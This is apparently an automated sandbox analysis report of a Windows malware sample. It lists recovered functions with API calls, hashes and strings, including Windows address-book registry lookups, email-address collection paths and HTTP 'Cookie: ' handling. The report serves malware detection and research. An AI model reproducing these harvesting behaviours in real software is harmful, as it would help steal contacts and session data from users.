Opcode ID: d0b596ea9643ec7b5305ad111d0116b05c7a9d5ab634a3820f606662a7dab3ac
Instruction ID: 6c35a7799245a7b04a12540a49f30ba11e8035cf82ba55a6543ce612591668cc
Opcode Fuzzy Hash: d0b596ea9643ec7b5305ad111d0116b05c7a9d5ab634a3820f606662a7dab3ac
Instruction Fuzzy Hash: 55013572C01119BBCB00EFE5DC44AEEBBB8EB48311F104012FA05A6190EA745A85EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009B8247, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 009B82D1
HeapFree.KERNEL32(00000000,?), ref: 009B82E2
HeapFree.KERNEL32(00000000,?), ref: 009B82FA
CloseHandle.KERNEL32(?), ref: 009B8314
HeapFree.KERNEL32(00000000,?), ref: 009B8329

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: b06f8d22a07f72d60506ce9ba5aa64b0bfca31c134ce50efba37efffd1b5a7ee
Instruction ID: 7b10e2b0fa73abcb60577e469983a9a846d2e4e56b69e3a2e0bf838b39df07a1
Opcode Fuzzy Hash: b06f8d22a07f72d60506ce9ba5aa64b0bfca31c134ce50efba37efffd1b5a7ee
Instruction Fuzzy Hash: 03312530616921AFCA119F69DD88D9BFBAEFF48B603544815F418C7665CB31ECA1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 009B880D, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 009CFC77: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 009CFC92
Part of subcall function 009CFC77: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 009CFCE0
Part of subcall function 009CFC77: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 009CFCF2
Part of subcall function 009CFC77: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 009CFD43

GetLastError.KERNEL32(?,?,00000001), ref: 009B899B
FreeLibrary.KERNEL32(?,?,00000001), ref: 009B8A03

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 17407e5fedb7698f140dd88683aacf62d92d6cd2d4751940e84cac4d18e2f147
Instruction ID: cd093002139db5524974d2231aca92450c984b2c1c99b94056033b28b966dd84
Opcode Fuzzy Hash: 17407e5fedb7698f140dd88683aacf62d92d6cd2d4751940e84cac4d18e2f147
Instruction Fuzzy Hash: A671C2B5E0020AEFCF00DFE5C9889EEBBB9FF48314B148869E515A7251DB35A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 009B4065, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 009B4112
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 009B4128
memset.NTDLL ref: 009B41C8
memset.NTDLL ref: 009B41D8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: c80332509274df0cf3744fe400d68d02379894a1bedf795d5d1a6dacc8f5d2aa
Instruction ID: 614dd5c790f3fdabcd98a3b627a26df43738003456ab743c75e7f45834e6bf66
Opcode Fuzzy Hash: c80332509274df0cf3744fe400d68d02379894a1bedf795d5d1a6dacc8f5d2aa
Instruction Fuzzy Hash: A741E831A00259ABDB10DFACDC45FDE77B8EFA4320F10852AF915AB282DB709E44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D5B53, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(009D839C,009D837C,?,00000008), ref: 009D5C93

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Part of subcall function 009C78AB: lstrlenW.KERNEL32(?,00000000,?,?,00000000,009BFFD9,00000000), ref: 009C78BC
Part of subcall function 009C78AB: lstrlenW.KERNEL32(009DA4C8,00000000,?,00000000,009BFFD9,00000000), ref: 009C78D3

Strings

EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 009D5C16
A8000A, xrefs: 009D5B82
1.0, xrefs: 009D5B7D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: 756cd22188e142969ac73e3b87bac092c9594588410619c444754f5cda14bcf4
Instruction ID: 7839354b5bad31738f3d69c18a3d4f9cc2ec6ca76b8d61f41f76b0b033af9587
Opcode Fuzzy Hash: 756cd22188e142969ac73e3b87bac092c9594588410619c444754f5cda14bcf4
Instruction Fuzzy Hash: 0D419D74A40705AFCB10DFA4C888EAEBBB8AF88705B158459F841EB351DB71EE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C1395, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009C14B5

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

GetLastError.KERNEL32 ref: 009C1429
WaitForSingleObject.KERNEL32(00000000), ref: 009C1439
GetLastError.KERNEL32 ref: 009C1459

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: fbc1ce67d5ec47b63411eb5a243312e6f6040ea931fa301e956037cf10314019
Instruction ID: 97cd7cf4c165b032d654de2559b120833f0fc6f79ced68beba9b98abc23651dd
Opcode Fuzzy Hash: fbc1ce67d5ec47b63411eb5a243312e6f6040ea931fa301e956037cf10314019
Instruction Fuzzy Hash: 51415C70D01209EFCF14DFA5C884AAEBBB9FB05344B20446EE406E7262D7309E84EB56

Uniqueness

Uniqueness Score: -1.00%

Function 009B18E3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C06E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C0714
Part of subcall function 009C06E2: HeapFree.KERNEL32(00000000,00000000,?,?,009C1F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 009C0739

HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B199D
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19BD
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19C9

Strings

https://, xrefs: 009B1913

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 9863be324f57224349133c101e420b996c2652b7bb8ee623108204bd91fcd3a8
Instruction ID: 275a0e0f524a71af62564f9183e3a359b2ed7d9f0e4f784e957faa0608f60934
Opcode Fuzzy Hash: 9863be324f57224349133c101e420b996c2652b7bb8ee623108204bd91fcd3a8
Instruction Fuzzy Hash: 3D21AD31812258FBCF225F60EDA4EDE7F79EF80BA0F40802AF90466061C7718D80EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C0BB6, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 009C0BE5
SetEvent.KERNEL32(?), ref: 009C0C2F
TlsSetValue.KERNEL32(00000001), ref: 009C0C69
TlsSetValue.KERNEL32(00000000), ref: 009C0C85

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 56ecefdb6a348844e89d3bf443ba801e46ebc974ac5d304d9d7f0d29b3d879b2
Instruction ID: 04c432b0983589aa8f19df3f7af6b32cd851f3baf7b54e9b260ba9a4dc28db6a
Opcode Fuzzy Hash: 56ecefdb6a348844e89d3bf443ba801e46ebc974ac5d304d9d7f0d29b3d879b2
Instruction Fuzzy Hash: 99219131994204EFDB219F59DC85F6A7BAAFB81710F140A2DF851CA1A0C771DC91EB51

Uniqueness

Uniqueness Score: -1.00%

Function 009CCC46, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009CCC9F
memcpy.NTDLL(00000018,?,?), ref: 009CCCC8
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0001292A,00000000,000000FF,00000008), ref: 009CCD07
HeapFree.KERNEL32(00000000,00000000), ref: 009CCD1A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: ab8bf55d14c2501977802f81cebe6d8c1f2b538e0cc3c8ac16fe5a8dbabd8689
Instruction ID: e60c4bae6abdf1575f2c01e4450adcbf9527e2f788bcff1dc2998dffdf1fecfe
Opcode Fuzzy Hash: ab8bf55d14c2501977802f81cebe6d8c1f2b538e0cc3c8ac16fe5a8dbabd8689
Instruction Fuzzy Hash: 98318F70646209AFDB209F28DC44F9A7FA9FF54320F00852AF81AC62E1D730ED55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B8BC3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009B8BE5
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 009B8C29
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 009B8C6F
CloseHandle.KERNEL32(?,?,?,?,?), ref: 009B8C92

Part of subcall function 009CEBD0: GetTickCount.KERNEL32 ref: 009CEBE0
Part of subcall function 009CEBD0: CreateFileW.KERNEL32(009D0C37,80000000,00000003,009DE0D4,00000003,00000000,00000000,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEBFD
Part of subcall function 009CEBD0: GetFileSize.KERNEL32(009D0C37,00000000,Local\,00000001,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC29
Part of subcall function 009CEBD0: CreateFileMappingA.KERNEL32(009D0C37,009DE0D4,00000002,00000000,00000000,009D0C37), ref: 009CEC3D
Part of subcall function 009CEBD0: lstrlen.KERNEL32(009D0C37,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC59
Part of subcall function 009CEBD0: lstrcpy.KERNEL32(?,009D0C37), ref: 009CEC69
Part of subcall function 009CEBD0: HeapFree.KERNEL32(00000000,009D0C37,?,009D0C37,00000000,00000000,009B45A1,00000000), ref: 009CEC84
Part of subcall function 009CEBD0: CloseHandle.KERNEL32(009D0C37,Local\,00000001,?,009D0C37), ref: 009CEC96

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 51557d1a5b29b7c6af783d2f4958d4c44df48255c1f894b5cf54b42f4ce7cf76
Instruction ID: 45ddeffce548df3c72e73e0dc5524c6dbb9aff8c2239b1f554611cd0300960ff
Opcode Fuzzy Hash: 51557d1a5b29b7c6af783d2f4958d4c44df48255c1f894b5cf54b42f4ce7cf76
Instruction Fuzzy Hash: 43217F71941208EBDB21DFA5DE44EEE7FBCEF48364F140126F91492161DB31994ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C6658, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C6687
lstrlen.KERNEL32(00000000), ref: 009C6697

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

strcpy.NTDLL ref: 009C66AE
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 009C66B8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: efd44a5dc7491a1c7c0925623108fb33c1e24436b24572fc78edbb0825fdeecb
Instruction ID: 2215bcdf96b745c1a5b9c1d7f1a608b11e3980d185cc757bc442fa8793c64e2e
Opcode Fuzzy Hash: efd44a5dc7491a1c7c0925623108fb33c1e24436b24572fc78edbb0825fdeecb
Instruction Fuzzy Hash: CD21F275915300AFEB106F24DC89F2677ECEF44355F00881EF89687291EB75D844DB22

Uniqueness

Uniqueness Score: -1.00%

Function 009D5E4D, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(06288D20), ref: 009D5E63
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009D5E7E
GetLastError.KERNEL32 ref: 009D5EEC
GetLastError.KERNEL32 ref: 009D5EFB

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 93859586f2f80c2032ad288de4a8b474bc5ba3aa357160ea70c7028a01b6880c
Instruction ID: 435e0d03de0a387f07f4c69fddafcde099d5e24bb9f6de0c15a21b6dfab65b3c
Opcode Fuzzy Hash: 93859586f2f80c2032ad288de4a8b474bc5ba3aa357160ea70c7028a01b6880c
Instruction Fuzzy Hash: 8F216832945609EFCB12EFA8DD08ADE7BB8FF04710B118107F905A7220CB34DA51EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009CF643, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009B3CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,009CF65A), ref: 009B3CCA

CreateFileA.KERNEL32(009CE1EA,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,009CE1EA,00000000), ref: 009CF695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CE1EA,4C72644C,?,00000B54), ref: 009CF6A7
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,009CE1EA,4C72644C,?,00000B54), ref: 009CF6BF
CloseHandle.KERNEL32(?,?,?,?,009CE1EA,4C72644C,?,00000B54), ref: 009CF6DA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 3659a80bed15582a9ca598acf8e6000db8c9ca5d4d15b00a8665d37ca133da59
Instruction ID: c3d0408ab183a545f69c4f9d1e72e22787eb1e14c106dc130ed36aea07c0a4c5
Opcode Fuzzy Hash: 3659a80bed15582a9ca598acf8e6000db8c9ca5d4d15b00a8665d37ca133da59
Instruction Fuzzy Hash: CA117C71A01118BBEB20ABA5CD89FEFBE6EEF41790F104029F610E10A1D7318A40DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 009C2426, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009C2441
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009C2465
RegCloseKey.ADVAPI32(?), ref: 009C24BD

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 009C248E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 3e542b71f6ed72c621d0b11c3959aae6a787d25c6cc4a1b3f4bcba967f70dcf8
Instruction ID: 60ec32bf6a981f9bfdfd10f90de89589e16f5b0e01e083f435af864fdbeea703
Opcode Fuzzy Hash: 3e542b71f6ed72c621d0b11c3959aae6a787d25c6cc4a1b3f4bcba967f70dcf8
Instruction Fuzzy Hash: 2621F4B5900108FFDB11DF98DC80DEEBBBDEB84344B20806AE805A6260D3759A80DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009CB9C6, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CA40B,00000000,?,?,009D4BA0,00000000,06288D60), ref: 009CB9D1
RtlAllocateHeap.NTDLL(00000000,?), ref: 009CB9E9
memcpy.NTDLL(00000000,?,-00000008,?,?,?,009CA40B,00000000,?,?,009D4BA0,00000000,06288D60), ref: 009CBA2D
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 009CBA4E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: c56ec6ba4f50e2c8367d7931412a3c6d6656aa84e96a2d90bdd7dba4cdb8d112
Instruction ID: 0986f9a00e66df6f7662514b8855ab3f98990d1bc7ba9f78d06311c372dc730a
Opcode Fuzzy Hash: c56ec6ba4f50e2c8367d7931412a3c6d6656aa84e96a2d90bdd7dba4cdb8d112
Instruction Fuzzy Hash: BD113672E01214AFC7109F69DC85E9EBBADDBC1360F05017AF508D7151EA709E44D761

Uniqueness

Uniqueness Score: -1.00%

Function 009C25FA, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?,767FD3B0,06288D54,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2620
StrTrimA.SHLWAPI(?,009DA48C,00000000,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C263F
StrChrA.SHLWAPI(?,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2650
StrTrimA.SHLWAPI(00000001,009DA48C,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2662

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 9d4e7d736c3e11e68d2978607e71542e82a5f8f97bf0a02dfc467d81d6f06eea
Instruction ID: 7096a4589ade4e6ed034b72a1f47706e7cd7747741ffb5e3e1a8bc11e3149d95
Opcode Fuzzy Hash: 9d4e7d736c3e11e68d2978607e71542e82a5f8f97bf0a02dfc467d81d6f06eea
Instruction Fuzzy Hash: 04118875651209BFCB01DF69C984FAE7BBCEF86795F10800AFC459B211CAB4DA40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C4151, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009BF60A: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009BF639
Part of subcall function 009BF60A: HeapFree.KERNEL32(00000000,00000000,?,?,009C4161,00000000,00000000,?,00000000,?,009C1FAB,?,?,?,?,?), ref: 009BF65C

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,009C1FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 009C418B

Part of subcall function 009D14AB: lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 009D14C2
Part of subcall function 009D14AB: lstrlen.KERNEL32(?), ref: 009D14CA
Part of subcall function 009D14AB: lstrlen.KERNEL32(?), ref: 009D1535
Part of subcall function 009D14AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 009D1560
Part of subcall function 009D14AB: memcpy.NTDLL(00000000,00000002,?), ref: 009D1571
Part of subcall function 009D14AB: memcpy.NTDLL(00000000,?,?), ref: 009D1587
Part of subcall function 009D14AB: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 009D1599
Part of subcall function 009D14AB: memcpy.NTDLL(00000000,009D83E4,00000002,00000000,?,?,00000000,?,?), ref: 009D15AC
Part of subcall function 009D14AB: memcpy.NTDLL(00000000,?,00000002), ref: 009D15C1

HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,009C1FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 009C41D7

Strings

Cookie: , xrefs: 009C4173
https://, xrefs: 009C419A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 7c2db601ec244908a59b07d841fdcd87a861767fc938880b59870ca9e0cce0b7
Instruction ID: 1644e4ba3433437918513451d72b158cbda47c6e517cf22a27efd9dff084c16f
Opcode Fuzzy Hash: 7c2db601ec244908a59b07d841fdcd87a861767fc938880b59870ca9e0cce0b7
Instruction Fuzzy Hash: FE01E132A95214BBCB225F29DC55FAF3B6CDBA1B60F088119FC49A7250CA30DD81D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 009C8215, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,009D493A,00000000,00000000), ref: 009C8233
GetLastError.KERNEL32(?,00000000,?,009D493A,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,009CB1A8,?,0000001E), ref: 009C823B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 00f65a1ec4fc9d68bee8138472b51b0512d9d5aa15704c564124f6625df3b166
Instruction ID: 54559d4e229e0cc590a18b2f7f481c2ae9eddacc07f2abfd4271d40f85382760
Opcode Fuzzy Hash: 00f65a1ec4fc9d68bee8138472b51b0512d9d5aa15704c564124f6625df3b166
Instruction Fuzzy Hash: 5D01F736548251BF86305B279C4CD6BBBACEBC67A0B100F1EF87593290CE305805D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 009B41E7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 009B41FA
lstrlen.KERNEL32(06288BC0), ref: 009B421B
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 009B4233
lstrcpy.KERNEL32(00000000,06288BC0), ref: 009B4245

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 9c39c7c52a114fc7dc390078d98a12bf82778106d20bec129b5f1a6fc208910f
Instruction ID: a5482dda85cc728084235fb4d945015527e66c55e84f238de4ea4a55bba20eae
Opcode Fuzzy Hash: 9c39c7c52a114fc7dc390078d98a12bf82778106d20bec129b5f1a6fc208910f
Instruction Fuzzy Hash: 25010876905244ABC3119FACEC44B9F7FBCAB88301F004469F95AD3242DA308948E760

Uniqueness

Uniqueness Score: -1.00%

Function 009C5B4A, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 009C5B57
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 009C5B7D
lstrcpy.KERNEL32(00000014,?), ref: 009C5BA2
memcpy.NTDLL(?,?,?), ref: 009C5BAF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 3dbc37817aba20c6530d6734760fb2363b7df2858ec3b90d44a33865615d6501
Instruction ID: 3c1719533f1c7563c68d38d9526d1c6f43ccb44f2adf979c43765b58229f9672
Opcode Fuzzy Hash: 3dbc37817aba20c6530d6734760fb2363b7df2858ec3b90d44a33865615d6501
Instruction Fuzzy Hash: D811467591570AEFCB21CF58D884E9ABBF8FB48704F10856EF85A87221D770E944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009CCFD0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 009CCFEC
lstrcmpi.KERNEL32(?,Main), ref: 009CD021

Strings

Blocked, xrefs: 009CCFE6
Main, xrefs: 009CD01B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: e407ea40e45da26195e0c30d36bc63c60e73dd924a60f63d1aec232cb7062de7
Instruction ID: beefb8972c0294e13a0a9a48fe8293f0dfee7229217886568857d662638719aa
Opcode Fuzzy Hash: e407ea40e45da26195e0c30d36bc63c60e73dd924a60f63d1aec232cb7062de7
Instruction Fuzzy Hash: E2015E35605249AB8B11EF299D81EBB377DFFC5750B00482EFC0157112DB34D812ABB2

Uniqueness

Uniqueness Score: -1.00%

Function 009D2AED, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,767FD3B0,00000000,?,009B65AB,00000000,747DF710,00000000,00000000,?,?,009D58C6,?,?), ref: 009D2AF4
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 009D2B0C
memcpy.NTDLL(0000000C,009B20D2,00000001,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009D2B22

Part of subcall function 009C25FA: StrChrA.SHLWAPI(?,?,767FD3B0,06288D54,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2620
Part of subcall function 009C25FA: StrTrimA.SHLWAPI(?,009DA48C,00000000,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C263F
Part of subcall function 009C25FA: StrChrA.SHLWAPI(?,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2650
Part of subcall function 009C25FA: StrTrimA.SHLWAPI(00000001,009DA48C,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2662

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 009D2B54

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: fe1129e7c8624c536807679d58effea0cf867e8b3ec95a139401ae27701fecf7
Instruction ID: 786118697f78dec76aa7b60a73632fdb4a36cf1e87a0ae5a94fb623a63c87b99
Opcode Fuzzy Hash: fe1129e7c8624c536807679d58effea0cf867e8b3ec95a139401ae27701fecf7
Instruction Fuzzy Hash: E901F731696301ABE3204F15EC84F6B7B6CFBA1B51F008437F609991A1C7B4D84AE761

Uniqueness

Uniqueness Score: -1.00%

Function 009D1415, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(009DE268), ref: 009D1420
Sleep.KERNEL32(0000000A,?,?,?,009C375B,00000000,?,00000029,009DE088,009BAC22,?), ref: 009D142A
SetEvent.KERNEL32(?,?,?,009C375B,00000000,?,00000029,009DE088,009BAC22,?), ref: 009D1481
RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009D14A0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: e54aa884a5a72e9163d2c6db6a478fb098c981668028336e864660175fffa264
Instruction ID: e0c1c2f73f32ce883748ca8484f74cf219d7f5d93391fbe120180da00d06a7d3
Opcode Fuzzy Hash: e54aa884a5a72e9163d2c6db6a478fb098c981668028336e864660175fffa264
